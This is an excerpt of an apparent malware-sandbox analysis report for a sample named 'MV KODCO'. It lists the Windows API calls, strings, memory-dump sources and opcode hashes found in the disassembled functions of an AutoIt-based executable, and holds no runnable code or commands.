                                                          • Opcode Fuzzy Hash: 9c3730f15e2043ac5a164a8bbfb863bbbe36e5d6bac4d2085043e76613928ca7
                                                          • Instruction Fuzzy Hash: ADE03971A81228BADB201BA2DC4DEDB7F1EEF067A1F048021F60AC4460C6B18581DBE0
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 0061B0D6
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,0061AC9D), ref: 0061B0DD
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0061AC9D), ref: 0061B0EA
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,0061AC9D), ref: 0061B0F1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: 2c3f8cafea2914f3a927804dd1053e263be12b0ca72860392cff260299153184
                                                          • Instruction ID: c7f3678ce7764e6553b125acab6ca4acbaa1c5c70eb2f41d175652d719079767
                                                          • Opcode Fuzzy Hash: 2c3f8cafea2914f3a927804dd1053e263be12b0ca72860392cff260299153184
                                                          • Instruction Fuzzy Hash: 2AE08632F01212DBD7201FB25C0CFC73BAAEF59792F019818F241D6040DBB48441C760
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 005FB496
                                                          • SetTextColor.GDI32(?,000000FF), ref: 005FB4A0
                                                          • SetBkMode.GDI32(?,00000001), ref: 005FB4B5
                                                          • GetStockObject.GDI32(00000005), ref: 005FB4BD
                                                          • GetWindowDC.USER32(?,00000000), ref: 0065DE2B
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0065DE38
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0065DE51
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0065DE6A
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0065DE8A
                                                          • ReleaseDC.USER32(?,00000000), ref: 0065DE95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          • Opcode ID: fdac03e100316ddbc74a14e4cb42b77f60bb8913bc4ae423ea2b37aea43f9bf0
                                                          • Instruction ID: 942efd4ba062040eaa2443bf940225b110b0e91a0d8f4cf62e1141b1e91af04a
                                                          • Opcode Fuzzy Hash: fdac03e100316ddbc74a14e4cb42b77f60bb8913bc4ae423ea2b37aea43f9bf0
                                                          • Instruction Fuzzy Hash: ACE0ED31600244AAEF215B64EC0DBD87F22AB5233AF14D766FA6A580E1C7F18585DB11
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0061B2DF
                                                          • UnloadUserProfile.USERENV(?,?), ref: 0061B2EB
                                                          • CloseHandle.KERNEL32(?), ref: 0061B2F4
                                                          • CloseHandle.KERNEL32(?), ref: 0061B2FC
                                                            • Part of subcall function 0061AB24: GetProcessHeap.KERNEL32(00000000,?,0061A848), ref: 0061AB2B
                                                            • Part of subcall function 0061AB24: HeapFree.KERNEL32(00000000), ref: 0061AB32
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: 2268057f1c71bb27cfd57c9c19ad557678a5087b0b6c60a58132a93a234160f1
                                                          • Instruction ID: 4ff1cccecf1fad08b480fad41682b588939a0f701f64db07d4e13554ef63dd42
                                                          • Opcode Fuzzy Hash: 2268057f1c71bb27cfd57c9c19ad557678a5087b0b6c60a58132a93a234160f1
                                                          • Instruction Fuzzy Hash: F1E0EC3A604005BFCB012FA5EC08859FFBBFF893613109222F62591671CB72A871EB91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: eb397bfbcee848886350d51a0345fe1abfe7a1b82f4c3e18f2f73e3fae5b7fbf
                                                          • Instruction ID: 95b8bf27bc787e3142ffa514ca938119c0152e6e5fa811f7bdb7400522b081f8
                                                          • Opcode Fuzzy Hash: eb397bfbcee848886350d51a0345fe1abfe7a1b82f4c3e18f2f73e3fae5b7fbf
                                                          • Instruction Fuzzy Hash: E7E01AB1A00204EFDB005F70C84862D7BA6FB4C351F119805FD5AC7250CAB898419F50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: e97ef19996dfb95746142e96ee06fa8bab276f9a11bf877a6f8a43c7bf8c8412
                                                          • Instruction ID: e38c7465ea4858d2e3553e068b29c82d3e237209ac7cb6f44285fddc8816eff6
                                                          • Opcode Fuzzy Hash: e97ef19996dfb95746142e96ee06fa8bab276f9a11bf877a6f8a43c7bf8c8412
                                                          • Instruction Fuzzy Hash: 81E046B1A00204EFDB005F70CC4C62D7FAAFB4C390F129809FA5ACB250CBB898008F50
                                                          APIs
                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0061DEAA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ContainedObject
                                                          • String ID: AutoIt3GUI$Container
                                                          • API String ID: 3565006973-3941886329
                                                          • Opcode ID: afe4cc2b31c5dba059752750453ed619a37ed63e7cd4b5f4d655739986c4c81a
                                                          • Instruction ID: 6c463d506b07a2a2db8453a0e8135b97309699a23f3c5a1c3547e21e0aeaf1d8
                                                          • Opcode Fuzzy Hash: afe4cc2b31c5dba059752750453ed619a37ed63e7cd4b5f4d655739986c4c81a
                                                          • Instruction Fuzzy Hash: 20914970600601AFDB14DF64C884FAABBFABF48710F14856DF94ACB690DB71E981CB60
                                                          APIs
                                                            • Part of subcall function 005FC6F4: _wcscpy.LIBCMT ref: 005FC717
                                                            • Part of subcall function 005E936C: __swprintf.LIBCMT ref: 005E93AB
                                                            • Part of subcall function 005E936C: __itow.LIBCMT ref: 005E93DF
                                                          • __wcsnicmp.LIBCMT ref: 0062DEFD
                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0062DFC6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                          • String ID: LPT
                                                          • API String ID: 3222508074-1350329615
                                                          • Opcode ID: 76d878d46d430f7a6aede324c33271014d2034d665c7e8da3b24286a1b2b1512
                                                          • Instruction ID: a1463cf4212bbc9efad09daed03ce92ca99bfea03dbdc6754a6d67f420062aae
                                                          • Opcode Fuzzy Hash: 76d878d46d430f7a6aede324c33271014d2034d665c7e8da3b24286a1b2b1512
                                                          • Instruction Fuzzy Hash: F161D171A00625AFCB18DF98D985EEEB7B6BF48310F004069F546AB391D770AE41CF54
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy
                                                          • String ID: I/e$I/e
                                                          • API String ID: 3048848545-2483585942
                                                          • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                          • Instruction ID: 2691a9830aea9b4b745a841d41bac0152340ce1fcf9e143a187cf1aa5cded236
                                                          • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                          • Instruction Fuzzy Hash: 5641F731900927BACF25DF99E461AFDBB72FF58310F50505AF981A7291DB309E82CB64
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 005FBCDA
                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 005FBCF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: d881171892a0bab98ad0d3656e53d0fcde3c628f0eb1647bb77cb15ab59b60c3
                                                          • Instruction ID: 164c9f2faa5ad00ef759957f4f259d8d972f8467fd6ac1ed274777656ee8b8fb
                                                          • Opcode Fuzzy Hash: d881171892a0bab98ad0d3656e53d0fcde3c628f0eb1647bb77cb15ab59b60c3
                                                          • Instruction Fuzzy Hash: 2C512B71408749ABE320AF14DC89BBFBBECFBD4354F41484EF2C8420A6DB7485A88756
                                                          APIs
                                                            • Part of subcall function 005E44ED: __fread_nolock.LIBCMT ref: 005E450B
                                                          • _wcscmp.LIBCMT ref: 0062C65D
                                                          • _wcscmp.LIBCMT ref: 0062C670
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$__fread_nolock
                                                          • String ID: FILE
                                                          • API String ID: 4029003684-3121273764
                                                          • Opcode ID: f1664c72586478df98b59dd0686b52a9b6a9de4b4fc86ea02ea4df4f65f94b1a
                                                          • Instruction ID: 0f4c1ee8de99241153a8906ff9e0a48447222a4d2cc47880a4fc827a20417466
                                                          • Opcode Fuzzy Hash: f1664c72586478df98b59dd0686b52a9b6a9de4b4fc86ea02ea4df4f65f94b1a
                                                          • Instruction Fuzzy Hash: 9741E572A0025ABADF24ABA49C45FEF7BBAEF89710F004069F605EB181D7709A048F54
                                                          APIs
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0064A85A
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0064A86F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: 2d2bd52a759f8788f11b8bf029ce8a76d38b144308ab064637361a4394c2121c
                                                          • Instruction ID: f671a14972c6e299a0fbe686f6a8a8e6e8c29f04343ac69e03c5e533c8411ee4
                                                          • Opcode Fuzzy Hash: 2d2bd52a759f8788f11b8bf029ce8a76d38b144308ab064637361a4394c2121c
                                                          • Instruction Fuzzy Hash: ED41FB79E41309AFDB54DFA4D881BDA7BBAFB09300F14106AE905EB341D771A942CF91
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 0064980E
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0064984A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: 079f259d4b159d679d2a780bcb0efdf1ab8abb80c5369a381c0a9fdc276556f2
                                                          • Instruction ID: 4447c56a9799974916f6a05b707bad43b403389ac51e35a736b763cfea58fd9c
                                                          • Opcode Fuzzy Hash: 079f259d4b159d679d2a780bcb0efdf1ab8abb80c5369a381c0a9fdc276556f2
                                                          • Instruction Fuzzy Hash: BA31AF71110604AEEB109F38CC81BFB77AAFF99760F009619F9A9C7190CA75AC81CB64
                                                          APIs
                                                          • _memset.LIBCMT ref: 006251C6
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00625201
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 50520251533d1f210647cc7bb3495daa31d0050d3cc12743ff3a9dd0b0cc122c
                                                          • Instruction ID: 3619c7d4446fdaaf618f56c94b9d3b864fdc6cde22da63f05e9544d0b857eb11
                                                          • Opcode Fuzzy Hash: 50520251533d1f210647cc7bb3495daa31d0050d3cc12743ff3a9dd0b0cc122c
                                                          • Instruction Fuzzy Hash: F8319531601A25EBEB38CF99E945BEEBBF6AF45350F144019E986A62D0D7709A44CF10
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __snwprintf
                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                          • API String ID: 2391506597-2584243854
                                                          • Opcode ID: f66a9431752c86d131647ed78de7d88f00702321bf8a13e9104d6dd982c259a4
                                                          • Instruction ID: acb710fab36d55f7c4159792e7fbdab0a567aa395e8be0d12c5d63cd441669c7
                                                          • Opcode Fuzzy Hash: f66a9431752c86d131647ed78de7d88f00702321bf8a13e9104d6dd982c259a4
                                                          • Instruction Fuzzy Hash: C121D531600219BFCF18EF65C882EEE7BBABF45344F004459F545AB281DB70EA45CBA5
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0064945C
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00649467
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: 895415915ead2d466f92ebd3d419e2e928e6bd01465d1abd92fff5cd5cad4c6f
                                                          • Instruction ID: 34959370f1afe55789a4f5b0799c3496346ec08d587bcaf5856b26b2f826a634
                                                          • Opcode Fuzzy Hash: 895415915ead2d466f92ebd3d419e2e928e6bd01465d1abd92fff5cd5cad4c6f
                                                          • Instruction Fuzzy Hash: 6D11B2713402086FEF219E54DC80EFB37AFEB893A4F100125F918972A0D6719C528B70
                                                          APIs
                                                            • Part of subcall function 005FB34E: GetWindowLongW.USER32(?,000000EB), ref: 005FB35F
                                                          • GetActiveWindow.USER32 ref: 0064DA7B
                                                          • EnumChildWindows.USER32(?,0064D75F,00000000), ref: 0064DAF5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$ActiveChildEnumLongWindows
                                                          • String ID: T1c
                                                          • API String ID: 3814560230-2249353262
                                                          • Opcode ID: f148e2eea79d5e4058c670f660bddab2d7f4ac4c262896b4df7323f9b88ef8f7
                                                          • Instruction ID: cb3cabc5013591fe83d3b64f676dafef1fb6243f41cc90ae3fb0e9f7e69d4929
                                                          • Opcode Fuzzy Hash: f148e2eea79d5e4058c670f660bddab2d7f4ac4c262896b4df7323f9b88ef8f7
                                                          • Instruction Fuzzy Hash: 51210C75A04205DFCB14EF28D854AA577E6FB9A320F291619F966CB3E0D730B840CF50
                                                          APIs
                                                            • Part of subcall function 005FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005FD1BA
                                                            • Part of subcall function 005FD17C: GetStockObject.GDI32(00000011), ref: 005FD1CE
                                                            • Part of subcall function 005FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 005FD1D8
                                                          • GetWindowRect.USER32(00000000,?), ref: 00649968
                                                          • GetSysColor.USER32(00000012), ref: 00649982
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: 58eed589e2fb36472cf2307e68a4d903b9a01363ce7feacc54be840e3e8ff92e
                                                          • Instruction ID: 690a83ef7582cb2cf987fd734bc9496b502b4706375e7005555ec2a15167e9ff
                                                          • Opcode Fuzzy Hash: 58eed589e2fb36472cf2307e68a4d903b9a01363ce7feacc54be840e3e8ff92e
                                                          • Instruction Fuzzy Hash: 0E11597266020AAFDB04DFB8CC45AEA7BA9FB08344F051618F956D2250D774E811DB60
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00649699
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006496A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
